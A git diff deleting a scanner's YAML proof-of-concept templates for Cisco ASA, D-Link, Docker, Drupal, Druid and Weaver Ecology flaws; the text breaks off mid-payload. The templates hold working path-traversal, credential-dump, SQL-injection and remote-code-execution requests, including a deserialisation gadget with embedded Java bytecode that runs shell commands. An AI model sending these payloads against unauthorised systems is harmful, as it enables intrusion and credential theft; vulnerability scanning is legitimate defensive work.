a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml b/WebScan/pocs/cisco-cve-2020-3452-readfile.yml deleted file mode 100644 index 0f4634b..0000000 --- a/WebScan/pocs/cisco-cve-2020-3452-readfile.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-cisco-cve-2020-3452-readfile -rules: - - method: GET - path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua - follow_redirects: false - expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED") -detail: - author: JrD (https://github.com/JrDw0/) - links: - - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 diff --git a/WebScan/pocs/coremail-cnvd-2019-16798.yml b/WebScan/pocs/coremail-cnvd-2019-16798.yml deleted file mode 100644 index 097f5fa..0000000 --- a/WebScan/pocs/coremail-cnvd-2019-16798.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-coremail-cnvd-2019-16798 -rules: - - method: GET - path: >- - /mailsms/s?func=ADMIN:appState&dumpConfig=/ - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("")) -detail: - author: cc_ci(https://github.com/cc8ci) - links: - - https://www.secpulse.com/archives/107611.html \ No newline at end of file diff --git a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml b/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml deleted file mode 100644 index 4445bce..0000000 --- a/WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-discuz-ml3x-cnvd-2019-22239 -set: - r1: randomInt(800000000, 1000000000) -rules: - - method: GET - path: /forum.php - follow_redirects: false - expression: | - response.status == 200 - search: cookiepre = '(?P[\w_]+)' - - method: GET - path: /forum.php - headers: - Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) -detail: - author: X.Yang - Discuz_version: Discuz!ML 3.x - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 diff --git a/WebScan/pocs/dlink-cve-2019-17506.yml b/WebScan/pocs/dlink-cve-2019-17506.yml deleted file mode 100644 index 87cdc7d..0000000 --- a/WebScan/pocs/dlink-cve-2019-17506.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-dlink-cve-2019-17506 -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: l1nk3r,Huasir(https://github.com/dahua966/) - links: - - https://xz.aliyun.com/t/6453 diff --git a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml b/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml deleted file mode 100644 index 7fa21e7..0000000 --- a/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-dlink-cve-2020-25078-account-disclosure -rules: - - method: GET - path: >- - /config/getuser?index=0 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg \ No newline at end of file diff --git a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml b/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml deleted file mode 100644 index fcbcf31..0000000 --- a/WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-dlink-cve-2020-9376-dump-credentials -rules: - - method: POST - path: /getcfg.php - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 - expression: > - response.status == 200 && response.body.bcontains(b"Admin") && response.body.bcontains(b"") && response.body.bcontains(b"") -detail: - author: x1n9Qi8 - Affected Version: "Dlink DIR-610" - links: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376 \ No newline at end of file diff --git a/WebScan/pocs/dlink-dcs-info-leak.yml b/WebScan/pocs/dlink-dcs-info-leak.yml deleted file mode 100644 index 746ff9f..0000000 --- a/WebScan/pocs/dlink-dcs-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-dlink-dcs-info-leak -rules: - - method: GET - path: /config/getuser?index=0 - expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw \ No newline at end of file diff --git a/WebScan/pocs/docker-api-unauthorized-rce.yml b/WebScan/pocs/docker-api-unauthorized-rce.yml deleted file mode 100644 index 2ddd55a..0000000 --- a/WebScan/pocs/docker-api-unauthorized-rce.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-docker-api-unauthorized-rce -rules: - - method: GET - path: /info - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir") - -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce diff --git a/WebScan/pocs/docker-registry-api-unauth.yml b/WebScan/pocs/docker-registry-api-unauth.yml deleted file mode 100644 index 8b7f36d..0000000 --- a/WebScan/pocs/docker-registry-api-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-docker-registry-api-unauth -rules: - - method: GET - path: /v2/ - follow_redirects: false - expression: > - response.status == 200 && "docker-distribution-api-version" in response.headers && response.headers["docker-distribution-api-version"].contains("registry/2.0") - - method: GET - path: /v2/_catalog - follow_redirects: false - expression: > - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"repositories") -detail: - author: p0wd3r - links: - - http://www.polaris-lab.com/index.php/archives/253/ diff --git a/WebScan/pocs/druid-monitor-unauth.yml b/WebScan/pocs/druid-monitor-unauth.yml deleted file mode 100644 index 15d2adb..0000000 --- a/WebScan/pocs/druid-monitor-unauth.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-druid-monitor-unauth -rules: - - method: GET - path: /druid/index.html - expression: | - response.status == 200 && response.body.bcontains(b"Druid Stat Index") && response.body.bcontains(b"DruidVersion") && response.body.bcontains(b"DruidDrivers") -detail: - author: met7or - links: - - https://github.com/alibaba/druid diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml deleted file mode 100644 index 87d6939..0000000 --- a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-drupal-cve-2014-3704-sqli -rules: - - method: POST - path: /?q=node&destination=node - body: >- - pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or - updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a - follow_redirects: false - expression: | - response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") -detail: - Affected Version: "Drupal < 7.32" - links: - - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml deleted file mode 100644 index 22cdad0..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml b/WebScan/pocs/drupal-cve-2018-7600-rce2.yml deleted file mode 100644 index 9e723bb..0000000 --- a/WebScan/pocs/drupal-cve-2018-7600-rce2.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-drupal-cve-2018-7600-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/drupal-cve-2019-6340.yml b/WebScan/pocs/drupal-cve-2019-6340.yml deleted file mode 100644 index 178a62b..0000000 --- a/WebScan/pocs/drupal-cve-2019-6340.yml +++ /dev/null @@ -1,33 +0,0 @@ -name: poc-yaml-drupal-cve-2019-6340 -set: - host: request.url.host - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /node/?_format=hal_json - headers: - Content-Type: application/hal+json - Accept: '*/*' - body: | - { - "link": [ - { - "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - } - ], - "_links": { - "type": { - "href": "http://{{host}}/rest/type/shortcut/default" - } - } - } - follow_redirects: true - expression: | - response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: thatqier - links: - - https://github.com/jas502n/CVE-2019-6340 - - https://github.com/knqyf263/CVE-2019-6340 \ No newline at end of file diff --git a/WebScan/pocs/drupal-drupal7geddon2-rce.yml b/WebScan/pocs/drupal-drupal7geddon2-rce.yml deleted file mode 100644 index d9897e4..0000000 --- a/WebScan/pocs/drupal-drupal7geddon2-rce.yml +++ /dev/null @@ -1,28 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 7 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ diff --git a/WebScan/pocs/drupal-drupal8geddon2-rce.yml b/WebScan/pocs/drupal-drupal8geddon2-rce.yml deleted file mode 100644 index d8f6192..0000000 --- a/WebScan/pocs/drupal-drupal8geddon2-rce.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch] -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - drupal_version: 8 - links: - - https://github.com/dreadlocked/Drupalgeddon2 - - https://paper.seebug.org/567/ -test: - target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/ecology-sqli.yml deleted file mode 100644 index 3a732d1..0000000 --- a/WebScan/pocs/ecology-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-ecology-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20md5({{rand}})%20as%20id%20from%20HrmResourceManager - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/ecology-validate-sqli.yml deleted file mode 100644 index 52d4c88..0000000 --- a/WebScan/pocs/ecology-validate-sqli.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecology-validate-sqli -set: - r1: randomInt(8000, 9999) - r2: randomInt(800, 1000) -rules: - - method: POST - path: /cpt/manage/validate.jsp?sourcestring=validateNum - body: >- - sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({{r1}}*{{r2}})&capitalnum=-10 - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fuping - links: - - https://news.ssssafe.com/archives/3325 - - https://www.weaver.com.cn/cs/securityDownload.asp \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/ecology-workflowservicexml-2.yml deleted file mode 100644 index 46d2ace..0000000 --- a/WebScan/pocs/ecology-workflowservicexml-2.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - headers: - Content-Type: text/xml - cmd: bin/bash -c 'expr {{rand1}} + {{rand2}}' - follow_redirects: false - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array> <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.body.bcontains(bytes(string(rand1 + rand2))) -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/ecology-workflowservicexml.yml deleted file mode 100644 index 1e0c50f..0000000 --- a/WebScan/pocs/ecology-workflowservicexml.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - follow_redirects: false - headers: - Content-Type: text/xml - cmd: type c:\\windows\\win.ini - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> 